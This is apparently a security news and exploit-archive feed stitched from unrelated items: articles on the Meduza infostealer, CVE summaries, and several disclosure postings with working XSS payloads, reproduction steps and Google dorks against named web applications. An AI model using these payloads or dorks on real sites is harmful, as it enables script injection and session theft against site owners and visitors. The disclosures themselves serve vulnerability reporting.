Cross Site Scripting vulnerability in daylight studio FUEL- CMS v.1.4.6 allows a remote attacker to execute arbitrary code via the page title, meta description and meta keywords of the pages function.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2020-22152: XSS in pages · Issue #552 · daylightstudio/FUEL-CMS

By Deeba Ahmed
Meduza malware is being fiercely marketed across different Telegram channels, cybercrime and dark web forums.
This is a post from HackRead.com Read the original post: New Meduza Malware Targets Wallets, Passwords and Browsers on Windows

**Meduza authors are pushing the malware as a subscription-based service, offering plans for 1-month, 3-month, and lifetime access.**

Crimeware-as-a-Service (CaaS) operations have become the latest fad in the world of cybercrime, and the Meduza Malware is the newest weapon added to its ever-increasing arsenal.

Uptycs Threat researchers report that Meduza Stealer is under active development and boasts comprehensive data-stealing capabilities, along with advanced detection evasion techniques.

**How Was Meduza Stealer Discovered?**

Uptycs researchers discovered the Meduza malware while monitoring Telegram channels and Dark Web forums. Initial examination revealed that the stealer was developed by someone with the username Meduza. According to the malware admin, Meduza does not perform ransomware operations and only functions as an information stealer.

**Meduza Targets- Windows Systems and Browsers**

The malware is designed to target Windows-based systems and organizations. Currently, it targets ten countries and pilfers a wide range of system and browser data, from login credentials to browsing history, bookmarks, etc.

It also targets data stored by 2FA, crypto wallets, and password managers. All types of extensions are vulnerable to Meduza. Check out the list of countries it can and cannot target:

*   Russia
*   Kazakhstan
*   Belarus
*   Georgia
*   Turkmenistan
*   Uzbekistan
*   Armenia
*   Kyrgyzstan
*   Moldova
*   Tajikistan

**What Makes Meduza Unusual?**

Researchers noted that it has a “crafty” operational design since, unlike other common malware, Meduza’s binary doesn’t use obfuscation techniques, making it virtually undetectable. The malware administrator has employed highly sophisticated marketing tactics to generate hype and trust for Meduza malware.

“In a calculated move to gain trust and confidence, they have initiated static and dynamic scans of the Meduza stealer file using some of the industry’s most reputable antivirus software. Screenshots were then shared, demonstrating that this potent malware could evade detection by these top-tier antivirus solutions,” researchers wrote in the report published on June 30th, 2023.

This malware is being fiercely marketed across different cybercrime forums and Telegram channels. Most antivirus software cannot detect its binary dynamically and statically, making the situation much more problematic for security researchers. The pricing model for Meduza is the real game-changer.

The admin offers numerous subscription packages, such as 1-month, 3-month, and lifetime access plans, at competitive prices ($199 per month, $399 for a 3-month subscription, and $1,199 for a lifetime license).

The Meduza malware is being advertised on the infamous Russian cybercrime and hacker forum XSS.IS (Left) – Meduza author boasting about the malware’s AV-evading capabilities. (Images: Hackread.com)

Moreover, the stolen data is available on a user-friendly web panel. Subscribers can create customized binaries and access, download, and delete sensitive data, including IP addresses, geographical data, stored cookies, wallets, passwords, and OS build names directly from the panel.

**Meduza Data Stealing Capabilities**

After infecting the machine, the malware scans for geolocation data against a predefined list of excluded countries and aborts operations if a match is found. Meduza malware connects to its operator’s C2 server if it doesn’t match. It starts stealing data only after the connection is established. It steals data from various Windows APIs, including GetUserName, GetComputerName, GetCurrentHWProfile, and EnumDisplayDevices.

It also collects system build CPU computer details, execute path, geolocation, OS, RAM, hardware IDs, GPU, TimeZone, screenshot resolution, username, etc. It also collects browser info, miner’s registry info, password manager info, and installed games details, probably to gain extensive financial and personal data.

Meduza comes with a predefined browser list and checks the User Data folder to get browser-related data such as cookies, history, web data, login data for accounts, and local state. It also steals Telegram Desktop app data from these Windows Registry paths:

    HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C4A4AE8F-B9F7-4CC7-8A6C-BF7EEE87ACA5}_is1

What’s worse, Meduza malware is also capable of collecting data from 19 password managers, stealing clients, Discord, 95 web browsers, and 76 cryptocurrency wallet extensions.

To stay protected, you must keep the OS, browsers, and installed applications updated so that vulnerabilities are time patched and use stronger passwords.

1.  Legion SMS Hijacking Malware Sold on Telegram
2.  100k Hacked ChatGPT Accounts Sold on Dark Web
3.  Hackers Leak i2VPN Admin Credentials on Telegram
4.  Hackers Advertising New Info-Stealer Malware on Dark Web

New Meduza Malware Targets Wallets, Passwords and Browsers on Windows

2FA is a Web app to manage Two-Factor Authentication (2FA) accounts and generate their security codes. Cross site scripting (XSS) injection can be done via the account/service field. This was tested in docker-compose environment. This vulnerability has been patched in version 4.0.3.


**Summary**

on /account/create an XSS injection can be done via the account/service field. (tested in docker-compose environment)

**PoC**

*   Navigate to /account/create and enter in the upper text field one of the following strings (more can be possible, I only tested those 2)

    <image/src/onerror=prompt(8)> 
    <img src=x onerror=javascript:alert(1)//">
    

*   click the next left button "Ich habe Glück" (sorry tested in German)
*   an alert is being executed
*   the first string can as well be saved as project name but luckily is not being executed on other pages

  
  

**Impact**

XSS is known as TOP 10 OWASP finding. I guess you already heared about it. If not, please have a look here: https://owasp.org/www-community/attacks/xss/.

CVE-2023-36816: XSS at Account creation

In yet another sign of a lucrative crimeware-as-a-service (CaaS) ecosystem, cybersecurity researchers have discovered a new Windows-based information stealer called Meduza Stealer that's actively being developed by its author to evade detection by software solutions.
"The Meduza Stealer has a singular objective: comprehensive data theft," Uptycs said in a new report. "It pilfers users' browsing

In yet another sign of a lucrative crimeware-as-a-service (CaaS) ecosystem, cybersecurity researchers have discovered a new Windows-based information stealer called **Meduza Stealer** that's actively being developed by its author to evade detection by software solutions.

"The Meduza Stealer has a singular objective: comprehensive data theft," Uptycs said in a new report. "It pilfers users' browsing activities, extracting a wide array of browser-related data."

"From critical login credentials to the valuable record of browsing history and meticulously curated bookmarks, no digital artifact is safe. Even crypto wallet extensions, password managers, and 2FA extensions are vulnerable."

Despite the similarity in features, Meduza boasts of a "crafty" operational design that eschews the use of obfuscation techniques and promptly terminates its execution on compromised hosts should a connection to the attacker's server fail.

It's also designed to abort if a victim's location is in the stealer's predefined list of excluded countries, which consists of the Commonwealth of Independent States (CIS) and Turkmenistan.

Meduza Stealer, besides gathering data from 19 password manager apps, 76 crypto wallets, 95 web browsers, Discord, Steam, and system metadata, harvests miner-related Windows Registry entries as well as a list of installed games, indicating a broader financial motive.

It's currently being offered for sale on underground forums such as XSS and Exploit.in and a dedicated Telegram channel as a recurring subscription that costs $199 per month, $399 for three months, or $1,199 for a lifetime license. The information pilfered by the malware is made available through a user-friendly web panel.

"This feature allows subscribers to download or delete the stolen data directly from the web page, granting them an unprecedented level of control over their ill-gotten information," the researchers said.

"This in-depth feature set showcases the sophisticated nature of the Meduza Stealer and the lengths its creators are willing to go to ensure its success."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Evasive Meduza Stealer Targets 19 Password Managers and 76 Crypto Wallets

Alkacon OpenCMS version 15.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Alkacon OpenCMS 15.0 - Multiple Cross-Site Scripting# Date: 1/07/2023# Exploit Author: tmrswrr# Vendor Homepage: http://www.opencms.org# Software Link: https://github.com/alkacon/opencms-core# Version: v15.0POC:1 ) Login in demo page , go to this urlhttps://demo.opencms.org/workplace#!explorer/8b72b2fe-180f-11ee-b326-0242ac11002b!!/sites/livedemo!!/.galleries/livedemo/!!2 ) Click /.galleries/ , after right click any png file  , open gallery, write in search button this payload<img src=. onerror=alert(document.domain)>3 ) You will be see alert boxPOC:1 ) Go to this url , right click any png file, rename title section and write your payload :  <img src=. onerror=alert(document.domain)>https://demo.opencms.org/workplace#!explorer/8b72b2fe-180f-11ee-b326-0242ac11002b!!/sites/livedemo!!/230701/ld_go87op3bfy/.galleries/images/!!2 ) You will be see alert box , stored xss POC:1 ) Go to this url , right click any png file and choose replace , click change file and choose your svg fileafter save it svg file:<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>  <script type="text/javascript">    alert("XSS");  </script></svg>2 ) When click this svg file you will be see alert button

Alkacon OpenCMS 15.0 Cross Site Scripting

Inout Search Engine AI Edition version 1.1 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.inoutscripts.com/products/inout-search-engine-ai-edition/      ││  Vendor   : Inout Scripts                                                              ││  Software : Inout Search Engine AI Edition 1.1                                         ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka          CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpGET 'page' parameter is vulnerable to RXSShttps://website/index.php?page=index%2findexl7fex%3cimg%20src%3da%20onerror%3dalert(1)%3ed392j&type=Web[-] Done

Inout Search Engine AI Edition 1.1 Cross Site Scripting

Vacation Rental version 1.8 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://gzscripts.com/vacation-rental-website.html                         ││  Vendor   : GZ Scripts                                                                 ││  Software : Vacation Rental 1.8                                                        ││  Vuln Type: Stored XSS                                                                 ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  Allow Attacker to inject malicious code into website, give ability to steal sensitive ││  information, manipulate data, and launch additional attacks.                          ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘   Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘## Stored XSS------------------------------------------------------------POST /VacationRentalWebsite/property/8/ad-has-principes/ HTTP/1.1property_id=8&action=detail&send_review=1&cleanliness=0%3B4.2&comfort=0%3B4.2&location=0%3B4.2&service=0%3B4.2&sleep=0%3B4.2&price=0%3B4.2&username=[XSS Payload]&evaluation=3&title=[XSS Payload]&comment=[XSS Payload]&captcha=lbhkyj------------------------------------------------------------POST parameter 'username' is vulnerable to XSSPOST parameter 'title' is vulnerable to XSSPOST parameter 'comment' is vulnerable to XSS## Steps to Reproduce:1. Surf (as Guest) - Go to any Listed Property2. Go to [Customer Reviews] on this Path (http://website/property/[Number1-9]/[name-of-Property]/#customerReviews)3. Inject your [XSS Payload] in "Username"4. Inject your [XSS Payload] in "Title"5. Inject your [XSS Payload] in "Comment"6. Submit7. XSS Fired on Local Browser8. XSS will Fire & Execute on Visitor's Browser when they visit the page of Property you [Inject] the XSS Payloads in & XSS will Fire also on the [Reviews Page]Note: I think Administration Panel missing a section to Manage [Reviews] on the website      this feature must be added in next Updates [View/Edit/Delete][-] Done

Vacation Rental 1.8 Cross Site Scripting

Strawberry version 1.1.9 suffers from a cross site scripting vulnerability.

**Strawberry 1.1.9 Cross Site Scripting**

Posted Jul 2, 2023

Authored by indoushka

Strawberry version 1.1.9 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 5006ad4fe5ee6631967fbcda59c50822e4f6cf4db227a33b6f3fba8640dbb942

Download | Favorite | View

**Strawberry 1.1.9 Cross Site Scripting**

    ====================================================================================================================================| # Title     : Strawberry 1.1.9 XSS Vulnerability                                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                             | | # Vendor    : https://cutenewsru.sourceforge.io/strawberry/                                                                      |  | # Dork      : "Powered by Strawberry 1.1.9"                                                                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /content/index.php/"onmouseover%3d'prompt(document.cookies)'bad%3d"[+] http://127.0.0.1/dverekomondoorcom/content/index.php/"onmouseover%3d'prompt(document.cookies)'bad%3d"Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |        =======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,554)
*   Arbitrary (16,117)
*   BBS (2,859)
*   Bypass (1,725)
*   CGI (1,025)
*   Code Execution (7,203)
*   Conference (678)
*   Cracker (841)
*   CSRF (3,328)
*   DoS (23,288)
*   Encryption (2,363)
*   Exploit (51,405)
*   File Inclusion (4,202)
*   File Upload (960)
*   Firewall (821)
*   Info Disclosure (2,742)
*   Intrusion Detection (888)
*   Java (3,007)
*   JavaScript (845)
*   Kernel (6,610)
*   Local (14,412)
*   Magazine (586)
*   Overflow (12,627)
*   Perl (1,423)
*   PHP (5,134)
*   Proof of Concept (2,336)
*   Protocol (3,571)
*   Python (1,526)
*   Remote (30,582)
*   Root (3,573)
*   Rootkit (506)
*   Ruby (611)
*   Scanner (1,633)
*   Security Tool (7,861)
*   Shell (3,168)
*   Shellcode (1,212)
*   Sniffer (893)
*   Spoof (2,193)
*   SQL Injection (16,254)
*   TCP (2,395)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,654)
*   Web (9,600)
*   Whitepaper (3,747)
*   x86 (961)
*   XSS (17,787)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,981)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,921)
*   Debian (6,782)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (346)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,065)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (483)
*   RedHat (13,489)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,707)
*   UNIX (9,256)
*   UnixWare (186)
*   Windows (6,560)
*   Other

Strawberry 1.1.9 Cross Site Scripting

Sisfo Sistem Informasi Akademik LMS version 1.9.3 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : sisfo Sistem Informasi Akademik lms v1.9.3  XSS Vulnerability                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                             | | # Vendor    : http://unisma.ac.id/                                                                                               |  | # Dork      : inurl:mnux?=login                                                                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /?lgn=frm&lid=50&mnux=login&nme=Kepala%2520Akademik'"()%26%25<acx><ScRiPt >prompt(/indoushka/)</ScRiPt>[+] https://127.0.0.1/siakad.stpi-pajak.ac.id/?lgn=frm&lid=50&mnux=login&nme=Kepala%2520Akademik%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(/indoushka/)%3C/ScRiPt%3EGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

Sisfo Sistem Informasi Akademik LMS 1.9.3 Cross Site Scripting

Rest-Cafe and Restaurant Website CMS version 2.0.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Rest-Cafe and Restaurant Website CMS 2.0.0  ْXSS Vulnerability                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 67.0.1(64-bit)                                             | | # Vendor    : https://codecanyon.net/item/rest-cafe-and-restaurant-website-cms/21630154                                          |  | # Dork      : "news.php?slug="                                                                                                   |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /news.php?slug=at-his-ludus-nonumes-gloriatur-ne-vim-tamquam%27%22()%26%25%3Cacx%3E%3CScRiPt%3Eprompt(005605414920)%3C/ScRiPt%3E[+] http://127.0.0.1/cms/news.php?slug=at-his-ludus-nonumes-gloriatur-ne-vim-tamquam%27%22()%26%25%3Cacx%3E%3CScRiPt%3Eprompt(005605414920)%3C/ScRiPt%3EGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

Tag

#xss